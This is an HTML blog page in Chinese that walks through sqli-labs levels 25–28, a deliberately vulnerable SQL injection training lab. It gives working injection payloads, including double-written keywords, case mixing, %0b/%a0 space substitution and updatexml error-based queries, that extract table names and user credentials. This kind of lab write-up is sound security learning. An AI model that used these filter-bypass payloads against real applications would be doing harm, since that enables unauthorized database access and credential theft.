
<!DOCTYPE html>
<html lang="en" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>sqli-labs25~28 - Hexo</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Fechin,"> 
    <meta name="description" content="Less-25很明显，or,and,被过滤了。首先正常输入，?id=1&amp;#39;报错了，发现为注入点。这里要了解一个双写绕过注入：**or改成oorr，and改成anandd **思路：要先判断是一,"> 
    <meta name="author" content="John Doe"> 
    <link rel="alternative" href="atom.xml" title="Hexo" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
    
<link rel="stylesheet" href="/css/diaspora.css">

	<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({
              google_ad_client: "ca-pub-8691406134231910",
              enable_page_level_ads: true
         });
    </script>
    <script async custom-element="amp-auto-ads"
        src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">Hexo</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="http://example.com"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">sqli-labs25~28</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">sqli-labs25~28</h1>
        <div class="stuff">
            <span>十二月 10, 2020</span>
            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag">SQL注入</a></li></ul>


        </div>
        <div class="content markdown">
            <h3 id="Less-25"><a href="#Less-25" class="headerlink" title="Less-25"></a>Less-25</h3><p>很明显，or,and,被过滤了。<br>首先正常输入，<code>?id=1&#39;</code>报错了，发现为注入点。<br>这里要了解一个双写绕过注入：**or改成oorr，and改成anandd **<br>思路：要先判断是一次性绕过还是非一次性过滤，如果是一次性就用双写绕过，如果是非一次性考虑其它变形。<br>eg：大小写变形绕过OR=oR=Or=or<br>    利用运算符or=|| ,and=&amp;&amp;<br>            URL编码绕过:#=%23<br>    Hex编码:~=0x7e<br>    添加注释:/<em>or</em>/还有其他等等。<br>所以使用联合查询注入：<code>?id=-1&#39; union select 1,2,group_concat(username,passwoorrd)from users--+</code><br><img src="25.md/0.png"><br>还能使用报错注入，这里使用&amp;&amp;会报错。(原因？？)<br><code>?id=-1&#39; || updatexml(1,concat(0x7c,database()),1)--+</code><br><img src="25.md/1.png"><br>布尔盲注等等。。。</p>
<h3 id="Less-25a"><a href="#Less-25a" class="headerlink" title="Less-25a"></a>Less-25a</h3><p>查看源码，sql语句为数字型注入，与第二关一样类型，再用和25关一样即可。<br>但是不能用报错注入，被注释了。</p>
<h3 id="Less-26"><a href="#Less-26" class="headerlink" title="Less-26"></a>Less-26</h3><p>首先判断注入点，为?id=1’再查看源代码，这里过滤掉了很多东西。<br>过滤了# or and 多行单行注释 斜杠 空格 反斜杠。<br>所以就要找其他的来代替空格注释？？？<br>空格URL编码替代方法：%a0(空格),%0a(新建一行),%0b(TAB垂直),%0c(新的一页),%0d(return功能),%09(TAB水平)<br>尝试了联合注入，不知道为什么一直不行，尝试报错注入就可以。？？？<br>爆表<br><code>?id=0&#39;||updatexml(1,concat(0x7c,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=&#39;security&#39;))),0)||&#39;1&#39;=&#39;1</code><br>这里用updatexml可以省去空格过滤得烦恼。记得加0x7c，不然有一个表会被吃掉<br><strong>这里还通过加()方式省去了打空格。</strong>减少错误的发生<br><img src="25.md/2.png"><br>爆用户名和密码<br><code>?id=0&#39;||updatexml(1,concat(0x7c,(select(group_concat(username,passwoorrd))from(users))),0)||&#39;1&#39;=&#39;1</code><br><img src="25.md/3.png"><br>这里如果把||改成anandd也不行.?对于报错原理还是不太行。</p>
<h4 id="PHP版本问题"><a href="#PHP版本问题" class="headerlink" title="PHP版本问题"></a>PHP版本问题</h4><p>因为版本问题，我输入的URL编码代替空格都会出现错误。这里把PHP版本换成5.2.17比较旧的版本。<br>就可以使用联合查询注入了，哈哈哈研究半天。。。不过也只有%0b、%a0可以用。</p>
<h3 id="Less-26a"><a href="#Less-26a" class="headerlink" title="Less-26a"></a>Less-26a</h3><p>换成’)即可，记得后面条件闭合语句也要改成(‘1’)=(‘1来进行闭合。<br>列举一个：<br><code>?id=&#39;)union%0bselect%0b1,group_concat(username,passwoorrd),3%0bfrom%0busers%0bwhere%0b(&#39;9&#39;)=(&#39;9</code><br><strong>还有这里输入?id=-1没有正确回显，让id=null(空值)如：?id=-100也可以。借此还可以查有几个用户，或者0才有正确回显，但是为什么？</strong><br><img src="25.md/4.png"></p>
<h3 id="Less-27"><a href="#Less-27" class="headerlink" title="Less-27"></a>Less-27</h3><p>从题目知道union、select被过滤了<br>查看源码：在26关基础上多过滤了union和select但是and，or这次没被过滤了。<br>尝试注入点：?id=1’报错，为单引号闭合型。</p>
<p><strong>这边order by语句一直报错？回看23关有解释。</strong></p>
<h4 id="直接查注入点"><a href="#直接查注入点" class="headerlink" title="直接查注入点"></a>直接查注入点</h4><p><code>?id=-100&#39;UnION%0bSElEct%0b1,2,3%0b||&#39;1&#39;=&#39;1</code><br><img src="25.md/5.png"><br>成功，还是要在字段2进行注入。字段一已经被1代替。</p>
<h4 id="查数据库"><a href="#查数据库" class="headerlink" title="查数据库"></a>查数据库</h4><p><code>?id=-100&#39;UnION%0bSElEct%0b1,database(),3%0b||&#39;1&#39;=&#39;1</code><br><img src="25.md/6.png"></p>
<h4 id="直接查用户名和密码"><a href="#直接查用户名和密码" class="headerlink" title="直接查用户名和密码"></a>直接查用户名和密码</h4><p><code>?id=-100&#39;UnION%0bSElEct%0b1,group_concat(username,&#39;-&#39;,password),3%0bfrom%0busers%0bwhere%0b&#39;1&#39;=&#39;1</code><br><img src="25.md/7.png"><br>使用第23关类似，直接用3闭合,也是可以的，更好。<br><code>?id=-15&#39;%0bUnIoN%0bsElEct%0b1,(sElEct%0bgroup_concat(concat(username,password))from%0busers),&#39;3</code><br><img src="25.md/8.png"><br>这里强调一下：<strong>记得用函数group_concat,它能够让返回的数据在一行，如果没用，会出现长度过长，数据爆不出来。</strong></p>
<h3 id="Less-27a"><a href="#Less-27a" class="headerlink" title="Less-27a"></a>Less-27a</h3><p>改成双引号即可。</p>
<h3 id="Less-28、28a"><a href="#Less-28、28a" class="headerlink" title="Less-28、28a"></a>Less-28、28a</h3><p>改成’)闭合就行，不过这里的?id=null跟26一样。<br>举个例子把:<br><code>?id=-15&#39;)UniOn%0b%0bSelEct%0b1,group_concat(username,password),3%0bfrom%0busers%0bwhere(&#39;1&#39;)=(&#39;1</code><br>还有简便方法：<br><code>?id=-15&#39;)%0BuNiOn%0BsElEct%0B1,(sEleCT%0bgroup_concat(username,password)from%0busers),(&#39;3</code></p>
<h3 id="Less-28a：这里跟28差不多，但是这里的-id-1不用是null？"><a href="#Less-28a：这里跟28差不多，但是这里的-id-1不用是null？" class="headerlink" title="Less-28a：这里跟28差不多，但是这里的?id=-1不用是null？"></a>Less-28a：这里跟28差不多，但是这里的?id=-1不用是null？</h3>
            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title='0' data-url='http://link.hhtjim.com/163/425570952.mp3'></li>
                        
                    
                        
                            <li title='1' data-url='http://link.hhtjim.com/163/425570952.mp3'></li>
                        
                    
                </ul>
            
        </div>
        
    <div id='gitalk-container' class="comment link"
		data-enable='false'
        data-ae='false'
        data-ci=''
        data-cs=''
        data-r=''
        data-o=''
        data-a=''
        data-d='false'
    >查看评论</div>


    </div>
    
</div>


    </div>
</div>
</body>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
